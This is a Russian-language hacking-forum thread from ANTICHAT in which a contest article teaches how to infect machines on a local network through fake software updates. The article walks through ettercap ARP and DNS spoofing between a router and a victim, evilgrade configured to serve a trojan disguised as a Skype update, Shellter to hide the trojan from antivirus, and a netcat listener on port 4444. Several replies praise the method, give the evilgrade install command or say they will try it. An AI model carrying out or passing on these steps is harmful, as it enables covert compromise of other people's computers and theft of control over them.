HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 05.11.2017, 14:25
Ondrik8
Новичок
Регистрация: 08.11.2016
Сообщений: 0
С нами: 5005666

Репутация: 0
По умолчанию

Статья для участия в конкурсе на античат
Всем привет, решил выдать еще одну статью на конкурс так-как сегодня узнал что в понедельник я уезжаю в ближнее зарубежье решать вопросы по работе(( Планировал я выпустить эту статью после 15 числа сего месяца но видно не судьба..) По этому выпускаю её экстерном и это будет заключительная моя статья для нашего конкурса от меня.
Речь пойдет о заражении машин в локальной сети через обновление софта пишу ее быстро так-как нужно еще успеть собраться в дорогу за орф. ошибки сильно не пинайте))
Приступлю как Все Мы знаем что все машины в сети постоянно делают запросы " типо не вышло ли что нить нового для меня!?" Это делают ОС-мы, программы от малого до велика платные и бесплатные все обращаются к своему источнику делая этот запрос "обновится"
Вот и расскажу я Вам как сделать fake-update так что бы при очередном запросе софта "домой" он (софт) получил ответ "типа: братка обновляйся! тут для тебя обновочка вышла" Софт в свою очередь будет дурить юзеру мозг, " Хозяин тут на меня обновка вышла нажми "ОК" я сам обновлюсь и будем мы жить с тобою в радости и в счастье"
Помогут нам осуществить эту атаку инструменты : metasploit, ettercap, netcat (котик) и гвоздь нашей программы evilgrade
Эта утилита просто "бомбезная" мало того что у нее есть свои модули для фэйк обновления так она еще дает возможность создавать свои модули для целевой ОС-и (любой) Linux | Windows что конечно же и радует)) подробно об этом инструменте и как создавать модули, Вы можете узнать здесь.

Далее что нам понадобится узнать родной дом программы для фэйк-обновления настроить инструмент ettercap

как узнать куда програмка стучится за обновкой можно двумя способами перехватить ее данные в wireshark-e или просто плотно изучив ее официальный сайт.

Узнали? Отлично, идем редачить файл конфигурации ettercap:

leafpad /etc/ettercap/etter.dns





и запускаем инструмент : ettercap -G





Sniff -->Unified Sniffing

Plugins -->Manage Plugins -->dns_spoof





Hosts --> scan hosts

Чтобы увидеть список машин в сети Hosts -> Hosts list





( по МАС-ам можете не стараться меня пробить)

Теперь поместите себя между маршрутизатором (192.168.1.1), выбрав его как Target 1 и жертву (192.168.1.--), выбрав его как Target 2.

и :





Отложим пока ettercap, настроим evilgrade до конца.

Как генерить и прятать троян от антивирусов здесь на Борде перемусолено, по этому останавливаться на этих моментах я не буду, как по мне так лучше, скачайте оригинал версию программы и смешайте её в shellter-e c Вашим трояном.

"вернемся к нашим баранам" Жванецкий

evilgrade > configure skype





evilgrade(skype) > set agent /root/папка_с_трояном/skype_update.exe start

Запускаем ettercap :



и просим котика что бы он слушал порт <-тот который слушает Метасплойт или Empire то есть на какой порт настроен наш троян!

nc -l -p 4444

и все!)) теперь когда жертва откроет в моем случае skype он (skype) в свою очередь по просит обновится она (терпилка) нажмет "ОК" а мы ....см. ниже))






как то так.))

PS: если выиграю конкурс часть средств уйдет в фонд маленьких замерзших котят, а остальное пойдет в фонд алкоголя для "crazy Rassian Hackers"
а если серьезно то за куплюсь плюшками-радиодеталями и буду Вас радывать новыми статьями)

Удачи..)

 
Ответить с цитированием

  #2  
Старый 05.11.2017, 15:27
Ondrik8
Новичок
Регистрация: 08.11.2016
Сообщений: 0
С нами: 5005666

Репутация: 0
По умолчанию

Цитата:

IioS сказал(а):

заражено сеть атомной станции

да, было такое вот этим)) Staxnet, но там еще пару 0-day участвовало )
 
Ответить с цитированием

  #3  
Старый 05.11.2017, 15:45
valerian38
Новичок
Регистрация: 20.07.2016
Сообщений: 0
С нами: 5165072

Репутация: 0
По умолчанию

Цитата:

IioS сказал(а):

Слышала что подобным методом было заражено сеть атомной станции

Ну не атомной станции, а предприятия по обогащению урана. Потом сеть там была локальная, заражение произошло через съёмный носитель.
 
Ответить с цитированием

  #4  
Старый 05.11.2017, 17:46
ghost
Новичок
Регистрация: 27.04.2010
Сообщений: 0
С нами: 8442422

Репутация: 0
По умолчанию

Ondrik8 и iios!
Вы прямо дополняете друг друга разными статьями.




Браво маэстры!
 
Ответить с цитированием

  #5  
Старый 06.11.2017, 03:18
vag4b0nd
Участник форума
Регистрация: 04.11.2017
Сообщений: 299
С нами: 4485744

Репутация: 0
По умолчанию

Способ действительно отличный)
Нужно как-нибудь обязательно опробовать.
 
Ответить с цитированием

  #6  
Старый 06.11.2017, 09:53
Ondrik8
Новичок
Регистрация: 08.11.2016
Сообщений: 0
С нами: 5005666

Репутация: 0
По умолчанию

Цитата:

ohno сказал(а):

Как устанавливается evilgrade? Ни слова на гите не нашёл.

apt install isr-evilgrade
 
Ответить с цитированием

  #7  
Старый 07.11.2017, 17:03
woolf1514
Новичок
Регистрация: 06.03.2017
Сообщений: 0
С нами: 4835747

Репутация: 0
По умолчанию

Мое почтение, автор. Это уже даже не технические навыки.. Это тех.скилзы + творчество. Побольше бы таких творцов, любящих делиться информацией!

Кстати, такая возможность реализована в intercepter-ng 1.0:

 
Ответить с цитированием

  #8  
Старый 09.11.2017, 15:52
newbiee
Новичок
Регистрация: 27.06.2017
Сообщений: 0
С нами: 4673078

Репутация: 0
По умолчанию

Цитата:

woolf1514 сказал(а):

Мое почтение, автор. Это уже даже не технические навыки.. Это тех.скилзы + творчество. Побольше бы таких творцов, любящих делиться информацией!

Кстати, такая возможность реализована в intercepter-ng 1.0:
так интерцептер же только в LAN работает? или я ошибаюсь?
 
Ответить с цитированием

  #9  
Старый 09.11.2017, 15:54
woolf1514
Новичок
Регистрация: 06.03.2017
Сообщений: 0
С нами: 4835747

Репутация: 0
По умолчанию

Цитата:

newbiee сказал(а):

так интерцептер же только в LAN работает? или я ошибаюсь?

В основном, да. Но для некоторых целей можно заставить и в сеть смотреть
 
Ответить с цитированием

  #10  
Старый 09.11.2017, 16:19
newbiee
Новичок
Регистрация: 27.06.2017
Сообщений: 0
С нами: 4673078

Репутация: 0
По умолчанию

Цитата:

woolf1514 сказал(а):

В основном, да. Но для некоторых целей можно заставить и в сеть смотреть

Я понял в чём соль, начал искать по поиску, статью: "Обходим NAT", а я её перенесли в серую секцию уже по ходу, да? Я прав? В эту сторону надо же копать? Короче надо срочно оформлять подписку на год)
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...